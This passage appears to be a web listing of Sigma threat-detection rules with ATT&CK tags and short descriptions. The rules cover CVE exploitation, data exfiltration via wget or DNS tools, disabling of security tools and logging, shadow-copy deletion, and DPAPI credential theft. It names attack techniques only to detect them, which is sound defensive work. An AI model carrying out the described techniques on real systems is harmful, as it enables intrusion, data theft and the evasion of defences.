Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts

Read More
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry

Aug 12, 2024 · attack.persistence attack.execution attack.defense-evasion attack.t1112 cve.2020-1048 ·
Share on:

Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.

Read More
CVE-2020-5902 F5 BIG-IP Exploitation Attempt

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-5902 detection.emerging-threats ·
Share on:

Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902

Read More
CVE-2021-1675 Print Spooler Exploitation

Aug 12, 2024 · attack.execution attack.t1569 cve.2021-1675 detection.emerging-threats ·
Share on:

Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675

Read More
CVE-2021-1675 Print Spooler Exploitation IPC Access

Aug 12, 2024 · attack.execution attack.t1569 cve.2021-1675 cve.2021-34527 detection.emerging-threats ·
Share on:

Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527

Read More
CVE-2021-21972 VSphere Exploitation

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-21972 detection.emerging-threats ·
Share on:

Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972

Read More
CVE-2021-21978 Exploitation Attempt

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-21978 detection.emerging-threats ·
Share on:

Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978

Read More
CVE-2021-26858 Exchange Exploitation

Aug 12, 2024 · attack.t1203 attack.execution cve.2021-26858 detection.emerging-threats ·
Share on:

Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content

Read More
CVE-2021-31979 CVE-2021-33771 Exploits

Aug 12, 2024 · attack.credential-access attack.t1566 attack.t1203 cve.2021-33771 cve.2021-31979 detection.emerging-threats ·
Share on:

Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum

Read More
CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum

Aug 12, 2024 · attack.credential-access attack.t1566 attack.t1203 cve.2021-33771 cve.2021-31979 detection.emerging-threats ·
Share on:

Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum

Read More
CVE-2021-33766 Exchange ProxyToken Exploitation

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-33766 detection.emerging-threats ·
Share on:

Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766

Read More
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit

Aug 12, 2024 · attack.initial-access attack.t1190 attack.persistence attack.t1505.003 cve.2021-40539 detection.emerging-threats ·
Share on:

Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).

Read More
CVE-2021-41773 Exploitation Attempt

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-41773 detection.emerging-threats ·
Share on:

Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.

Read More
CVE-2021-44077 POC Default Dropped File

Aug 12, 2024 · attack.execution cve.2021-44077 detection.emerging-threats ·
Share on:

Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)

Read More
CVE-2022-24527 Microsoft Connected Cache LPE

Aug 12, 2024 · attack.privilege-escalation attack.t1059.001 cve.2022-24527 detection.emerging-threats ·
Share on:

Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache

Read More
CVE-2022-31656 VMware Workspace ONE Access Auth Bypass

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-31656 detection.emerging-threats ·
Share on:

Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656 VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.

Read More
CVE-2022-31659 VMware Workspace ONE Access RCE

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-31659 detection.emerging-threats ·
Share on:

Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659

Read More
CVE-2023-23397 Exploitation Attempt

Aug 12, 2024 · attack.credential-access attack.initial-access cve.2023-23397 detection.emerging-threats ·
Share on:

Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.

Read More
CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File

Aug 12, 2024 · attack.execution cve.2023-38331 detection.emerging-threats ·
Share on:

Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331

Read More
CVE-2023-40477 Potential Exploitation - .REV File Creation

Aug 12, 2024 · attack.execution cve.2023-40477 detection.emerging-threats ·
Share on:

Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.

Read More
CVE-2023-40477 Potential Exploitation - WinRAR Application Crash

Aug 12, 2024 · attack.execution cve.2023-40477 detection.emerging-threats ·
Share on:

Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477

Read More
DarkSide Ransomware Pattern

Aug 12, 2024 · attack.execution attack.t1204 detection.emerging-threats ·
Share on:

Detects DarkSide Ransomware and helpers

Read More
Data Compressed

Aug 12, 2024 · attack.exfiltration attack.t1560.001 ·
Share on:

An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Read More
Data Copied To Clipboard Via Clip.EXE

Aug 12, 2024 · attack.collection attack.t1115 ·
Share on:

Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.

Read More
Data Exfiltration to Unsanctioned Apps

Aug 12, 2024 · attack.exfiltration attack.t1537 ·
Share on:

Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.

Read More
Data Exfiltration with Wget

Aug 12, 2024 · attack.exfiltration attack.t1048.003 ·
Share on:

Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.

Read More
DCERPC SMB Spoolss Named Pipe

Aug 12, 2024 · attack.lateral-movement attack.t1021.002 ·
Share on:

Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.

Read More
DCOM InternetExplorer.Application Iertutil DLL Hijack - Security

Aug 12, 2024 · attack.lateral-movement attack.t1021.002 attack.t1021.003 ·
Share on:

Detects a threat actor creating a file named iertutil.dll in the C:\Program Files\Internet Explorer\ directory over the network for a DCOM InternetExplorer DLL Hijack scenario.

Read More
DD File Overwrite

Aug 12, 2024 · attack.impact attack.t1485 ·
Share on:

Detects potential overwriting and deletion of a file using DD.

Read More
Decode Base64 Encoded Text

Aug 12, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects usage of base64 utility to decode arbitrary base64-encoded text

Read More
Decode Base64 Encoded Text -MacOs

Aug 12, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects usage of base64 utility to decode arbitrary base64-encoded text

Read More
Default Cobalt Strike Certificate

Aug 12, 2024 · attack.command-and-control attack.s0154 ·
Share on:

Detects the presence of default Cobalt Strike certificate in the HTTPS traffic

Read More
Default Credentials Usage

Aug 12, 2024 · attack.initial-access ·
Share on:

Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.

Read More
Default RDP Port Changed to Non Standard Port

Aug 12, 2024 · attack.persistence attack.t1547.010 ·
Share on:

Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).

Read More
Defrag Deactivation

Aug 12, 2024 · attack.persistence attack.t1053.005 attack.s0111 detection.emerging-threats ·
Share on:

Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group

Read More
Defrag Deactivation - Security

Aug 12, 2024 · attack.persistence attack.t1053 attack.s0111 detection.emerging-threats ·
Share on:

Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group

Read More
Delegated Permissions Granted For All Users

Aug 12, 2024 · attack.credential-access attack.t1528 ·
Share on:

Detects when highly privileged delegated permissions are granted on behalf of all users

Read More
Delete All Scheduled Tasks

Aug 12, 2024 · attack.impact attack.t1489 ·
Share on:

Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.

Read More
Delete Important Scheduled Task

Aug 12, 2024 · attack.impact attack.t1489 ·
Share on:

Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

Read More
Delete Volume Shadow Copies Via WMI With PowerShell

Aug 12, 2024 · attack.impact attack.t1490 ·
Share on:

Shadow Copies deletion using operating systems utilities via PowerShell

Read More
Delete Volume Shadow Copies via WMI with PowerShell - PS Script

Aug 12, 2024 · attack.impact attack.t1490 ·
Share on:

Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

Read More
Deleted Data Overwritten Via Cipher.EXE

Aug 12, 2024 · attack.impact attack.t1485 ·
Share on:

Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives

Read More
Deletion of Volume Shadow Copies via WMI with PowerShell

Aug 12, 2024 · attack.impact attack.t1490 ·
Share on:

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

Read More
Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script

Aug 12, 2024 · attack.impact attack.t1490 ·
Share on:

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

Read More
Denied Access To Remote Desktop

Aug 12, 2024 · attack.lateral-movement attack.t1021.001 ·
Share on:

This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network.

Read More
Deny Service Access Using Security Descriptor Tampering Via Sc.EXE

Aug 12, 2024 · attack.persistence attack.t1543.003 ·
Share on:

Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.

Read More
Deployment AppX Package Was Blocked By AppLocker

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects an appx package deployment that was blocked by AppLocker policy

Read More
Deployment Of The AppX Package Was Blocked By The Policy

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects an appx package deployment that was blocked by the local computer policy

Read More
Detect Virtualbox Driver Installation OR Starting Of VMs

Aug 12, 2024 · attack.defense-evasion attack.t1564.006 attack.t1564 ·
Share on:

Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.

Read More
Detected Windows Software Discovery

Aug 12, 2024 · attack.discovery attack.t1518 ·
Share on:

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

Read More
Detected Windows Software Discovery - PowerShell

Aug 12, 2024 · attack.discovery attack.t1518 ·
Share on:

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

Read More
Detection of PowerShell Execution via Sqlps.exe

Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1127 ·
Share on:

This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

Read More
Device Installation Blocked

Aug 12, 2024 · attack.initial-access attack.t1200 ·
Share on:

Detects an installation of a device that is forbidden by the system policy

Read More
Device Registration or Join Without MFA

Aug 12, 2024 · attack.defense-evasion attack.t1078.004 ·
Share on:

Monitor and alert for device registration or join events where MFA was not performed.

Read More
DeviceCredentialDeployment Execution

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects the execution of DeviceCredentialDeployment to hide a process from view

Read More
Devil Bait Potential C2 Communication Traffic

Aug 12, 2024 · attack.command-and-control detection.emerging-threats ·
Share on:

Detects potential C2 communication related to Devil Bait malware

Read More
Devtoolslauncher.exe Executes Specified Binary

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

The Devtoolslauncher.exe executes other binary

Read More
DEWMODE Webshell Access

Aug 12, 2024 · attack.persistence attack.t1505.003 detection.emerging-threats ·
Share on:

Detects access to DEWMODE webshell as described in FIREEYE report

Read More
DHCP Callout DLL Installation

Aug 12, 2024 · attack.defense-evasion attack.t1574.002 attack.t1112 ·
Share on:

Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)

Read More
DHCP Server Error Failed Loading the CallOut DLL

Aug 12, 2024 · attack.defense-evasion attack.t1574.002 ·
Share on:

This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded

Read More
DHCP Server Loaded the CallOut DLL

Aug 12, 2024 · attack.defense-evasion attack.t1574.002 ·
Share on:

This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded

Read More
Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1202 cve.2022-30190 ·
Share on:

Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library

Read More
DiagTrackEoP Default Login Username

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects the default "UserName" used by the DiagTrackEoP POC

Read More
Direct Autorun Keys Modification

Aug 12, 2024 · attack.persistence attack.t1547.001 ·
Share on:

Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.

Read More
Directory Removal Via Rmdir

Aug 12, 2024 · attack.defense-evasion attack.t1070.004 ·
Share on:

Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

Read More
Directory Service Restore Mode(DSRM) Registry Value Tampering

Aug 12, 2024 · attack.persistence attack.t1556 ·
Share on:

Detects changes to "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.

Read More
DirectorySearcher Powershell Exploitation

Aug 12, 2024 · attack.discovery attack.t1018 ·
Share on:

Enumerates Active Directory to determine computers that are joined to the domain

Read More
DirLister Execution

Aug 12, 2024 · attack.discovery attack.t1083 ·
Share on:

Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.

Read More
Disable Administrative Share Creation at Startup

Aug 12, 2024 · attack.defense-evasion attack.t1070.005 ·
Share on:

Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system

Read More
Disable Exploit Guard Network Protection on Windows Defender

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects disabling Windows Defender Exploit Guard Network Protection

Read More
Disable Macro Runtime Scan Scope

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros

Read More
Disable Microsoft Defender Firewall via Registry

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage

Read More
Disable of ETW Trace - Powershell

Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1562.006 car.2016-04-002 ·
Share on:

Detects usage of powershell cmdlets to disable or remove ETW trace sessions

Read More
Disable Or Stop Services

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services

Read More
Disable Powershell Command History

Aug 12, 2024 · attack.defense-evasion attack.t1070.003 ·
Share on:

Detects scripts or commands that disabled the Powershell command history by removing psreadline module

Read More
Disable Privacy Settings Experience in Registry

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects registry modifications that disable Privacy Settings Experience

Read More
Disable PUA Protection on Windows Defender

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects disabling Windows Defender PUA protection

Read More
Disable Security Events Logging Adding Reg Key MiniNt

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 attack.t1112 ·
Share on:

Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.

Read More
Disable Security Tools

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects disabling security tools

Read More
Disable System Firewall

Aug 12, 2024 · attack.t1562.004 attack.defense-evasion ·
Share on:

Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.

Read More
Disable Tamper Protection on Windows Defender

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects disabling Windows Defender Tamper Protection

Read More
Disable Windows Defender AV Security Monitoring

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects attackers attempting to disable Windows Defender using Powershell

Read More
Disable Windows Firewall by Registry

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detect set EnableFirewall to 0 to disable the Windows firewall

Read More
Disable Windows IIS HTTP Logging

Aug 12, 2024 · attack.defense-evasion attack.t1562.002 ·
Share on:

Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)

Read More
Disable Windows Security Center Notifications

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detect set UseActionCenterExperience to 0 to disable the Windows security center notification

Read More
Disable-WindowsOptionalFeature Command PowerShell

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Read More
Disabled IE Security Features

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features

Read More
Disabled MFA to Bypass Authentication Mechanisms

Aug 12, 2024 · attack.persistence attack.t1556 ·
Share on:

Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.

Read More
Disabled Volume Snapshots

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects commands that temporarily turn off Volume Snapshots

Read More
Disabled Windows Defender Eventlog

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections

Read More
Disabling Multi Factor Authentication

Aug 12, 2024 · attack.persistence attack.t1556 ·
Share on:

Detects disabling of Multi Factor Authentication.

Read More
Disabling Security Tools

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detects disabling security tools

Read More
Disabling Security Tools - Builtin

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detects disabling security tools

Read More
Discovery of a System Time

Aug 12, 2024 · attack.discovery attack.t1124 ·
Share on:

Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.

Read More
Discovery Using AzureHound

Aug 12, 2024 · attack.discovery attack.t1087.004 attack.t1526 ·
Share on:

Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.

Read More
Disk Image Creation Via Hdiutil - MacOS

Aug 12, 2024 · attack.exfiltration ·
Share on:

Detects the execution of the hdiutil utility in order to create a disk image.

Read More
Disk Image Mounting Via Hdiutil - MacOS

Aug 12, 2024 · attack.initial-access attack.t1566.001 attack.t1560.001 ·
Share on:

Detects the execution of the hdiutil utility in order to mount disk images.

Read More
Django Framework Exceptions

Aug 12, 2024 · attack.initial-access attack.t1190 ·
Share on:

Detects suspicious Django web application framework exceptions that could indicate exploitation attempts

Read More
DLL Execution via Rasautou.exe

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.

Read More
DLL Execution Via Register-cimprovider.exe

Aug 12, 2024 · attack.defense-evasion attack.t1574 ·
Share on:

Detects using register-cimprovider.exe to execute arbitrary dll file.

Read More
DLL Load By System Process From Suspicious Locations

Aug 12, 2024 · attack.defense-evasion attack.t1070 ·
Share on:

Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"

Read More
DLL Load via LSASS

Aug 12, 2024 · attack.execution attack.persistence attack.t1547.008 ·
Share on:

Detects a method to load DLL via LSASS process using an undocumented Registry key

Read More
DLL Loaded From Suspicious Location Via Cmspt.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218.003 ·
Share on:

Detects cmstp loading "dll" or "ocx" files from suspicious locations

Read More
DLL Loaded via CertOC.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.

Read More
DLL Search Order Hijackig Via Additional Space in Path

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.002 ·
Share on:

Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack

Read More
DLL Sideloading by VMware Xfer Utility

Aug 12, 2024 · attack.defense-evasion attack.t1574.002 ·
Share on:

Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL

Read More
DLL Sideloading Of ShellChromeAPI.DLL

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001 attack.t1574.002 ·
Share on:

Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter

Read More
Dllhost.EXE Execution Anomaly

Aug 12, 2024 · attack.defense-evasion attack.t1055 ·
Share on:

Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.

Read More
DllUnregisterServer Function Call Via Msiexec.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218.007 ·
Share on:

Detects MsiExec loading a DLL and calling its DllUnregisterServer function

Read More
DNS Events Related To Mining Pools

Aug 12, 2024 · attack.execution attack.t1569.002 attack.impact attack.t1496 ·
Share on:

Identifies clients that may be performing DNS lookups associated with common currency mining pools.

Read More
DNS Exfiltration and Tunneling Tools Execution

Aug 12, 2024 · attack.exfiltration attack.t1048.001 attack.command-and-control attack.t1071.004 attack.t1132.001 ·
Share on:

Well-known DNS Exfiltration tools execution

Read More
DNS HybridConnectionManager Service Bus

Aug 12, 2024 · attack.persistence attack.t1554 ·
Share on:

Detects Azure Hybrid Connection Manager services querying the Azure service bus service

Read More
DNS Query for Anonfiles.com Domain - DNS Client

Aug 12, 2024 · attack.exfiltration attack.t1567.002 ·
Share on:

Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes

Read More
DNS Query for Anonfiles.com Domain - Sysmon

Aug 12, 2024 · attack.exfiltration attack.t1567.002 ·
Share on:

Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes

Read More
DNS Query Request By Regsvr32.EXE

Aug 12, 2024 · attack.execution attack.t1559.001 attack.defense-evasion attack.t1218.010 ·
Share on:

Detects DNS queries initiated by "Regsvr32.exe"

Read More
DNS Query To AzureWebsites.NET By Non-Browser Process

Aug 12, 2024 · attack.command-and-control attack.t1219 ·
Share on:

Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.

Read More
DNS Query to External Service Interaction Domains

Aug 12, 2024 · attack.initial-access attack.t1190 attack.reconnaissance attack.t1595.002 ·
Share on:

Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE

Read More
DNS Query To MEGA Hosting Website

Aug 12, 2024 · attack.exfiltration attack.t1567.002 ·
Share on:

Detects DNS queries for subdomains related to MEGA sharing website

Read More
DNS Query To MEGA Hosting Website - DNS Client

Aug 12, 2024 · attack.exfiltration attack.t1567.002 ·
Share on:

Detects DNS queries for subdomains related to MEGA sharing website

Read More
DNS Query To Ufile.io

Aug 12, 2024 · attack.exfiltration attack.t1567.002 ·
Share on:

Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

Read More
DNS Query To Ufile.io - DNS Client

Aug 12, 2024 · attack.exfiltration attack.t1567.002 ·
Share on:

Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

Read More
DNS Query Tor .Onion Address - Sysmon

Aug 12, 2024 · attack.command-and-control attack.t1090.003 ·
Share on:

Detects DNS queries to an ".onion" address related to Tor routing networks

Read More
DNS RCE CVE-2020-1350

Aug 12, 2024 · attack.initial-access attack.t1190 attack.execution attack.t1569.002 cve.2020-1350 detection.emerging-threats ·
Share on:

Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process

Read More
DNS Server Discovery Via LDAP Query

Aug 12, 2024 · attack.discovery attack.t1482 ·
Share on:

Detects DNS server discovery via LDAP query requests from uncommon applications

Read More
DNS Server Error Failed Loading the ServerLevelPluginDLL

Aug 12, 2024 · attack.defense-evasion attack.t1574.002 ·
Share on:

Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded

Read More
DNS TOR Proxies

Aug 12, 2024 · attack.exfiltration attack.t1048 ·
Share on:

Identifies IPs performing DNS lookups associated with common Tor proxies.

Read More
DNS TXT Answer with Possible Execution Strings

Aug 12, 2024 · attack.command-and-control attack.t1071.004 ·
Share on:

Detects strings used in command execution in DNS TXT Answer

Read More
DNS-over-HTTPS Enabled by Registry

Aug 12, 2024 · attack.defense-evasion attack.t1140 attack.t1112 ·
Share on:

Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.

Read More
Docker Container Discovery Via Dockerenv Listing

Aug 12, 2024 · attack.discovery attack.t1082 ·
Share on:

Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery

Read More
Domain Trust Discovery Via Dsquery

Aug 12, 2024 · attack.discovery attack.t1482 ·
Share on:

Detects execution of "dsquery.exe" for domain trust discovery

Read More
DotNET Assembly DLL Loaded Via Office Application

Aug 12, 2024 · attack.execution attack.t1204.002 ·
Share on:

Detects any assembly DLL being loaded by an Office Product

Read More
DotNet CLR DLL Loaded By Scripting Applications

Aug 12, 2024 · attack.execution attack.privilege-escalation attack.t1055 ·
Share on:

Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.

Read More
Download File To Potentially Suspicious Directory Via Wget

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects the use of wget to download content to a suspicious directory

Read More
Download from Suspicious Dyndns Hosts

Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1105 attack.t1568 ·
Share on:

Detects download of certain file types from hosts with dynamic DNS names (selected list)

Read More
Download From Suspicious TLD - Blacklist

Aug 12, 2024 · attack.initial-access attack.t1566 attack.execution attack.t1203 attack.t1204.002 ·
Share on:

Detects download of certain file types from hosts in suspicious TLDs

Read More
Download From Suspicious TLD - Whitelist

Aug 12, 2024 · attack.initial-access attack.t1566 attack.execution attack.t1203 attack.t1204.002 ·
Share on:

Detects executable downloads from suspicious remote systems

Read More
DPAPI Backup Keys And Certificate Export Activity IOC

Aug 12, 2024 · attack.t1555 attack.t1552.004 ·
Share on:

Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.

Read More
DPAPI Domain Backup Key Extraction

Aug 12, 2024 · attack.credential-access attack.t1003.004 ·
Share on:

Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers

Read More
DPAPI Domain Master Key Backup Attempt

Aug 12, 2024 · attack.credential-access attack.t1003.004 ·
Share on:

